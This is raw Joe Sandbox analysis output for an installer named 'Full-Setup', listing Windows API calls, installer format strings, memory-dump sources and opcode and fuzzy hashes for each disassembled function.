                                                                                                                                                                          Strings
                                                                                                                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                          • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                          • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                          • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                          • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                          • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                          • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                                                          • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                          • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                          • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                          • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                          • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                          • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                          • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                          • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                          • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                          • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                          • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                          • String ID: !
                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                          • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                          • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                          • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                          • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                          • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                          • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                          • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                          • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                          • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                          • API String ID: 1697273262-1764544995
                                                                                                                                                                          • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                          • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                          • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                            • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                            • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                          • API String ID: 2577523808-3778932970
                                                                                                                                                                          • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                          • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                          • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                          • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcatwsprintf
                                                                                                                                                                          • String ID: %02x%c$...
                                                                                                                                                                          • API String ID: 3065427908-1057055748
                                                                                                                                                                          • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                          • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                          • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                          • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                          APIs
                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                          • API String ID: 2266616436-4211696005
                                                                                                                                                                          • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                          • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                          • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                          • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427773,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                          • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1599320355-0
                                                                                                                                                                          • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                          • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                          • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                          • String ID: Version
                                                                                                                                                                          • API String ID: 512980652-315105994
                                                                                                                                                                          • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                          • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                          • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                          • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
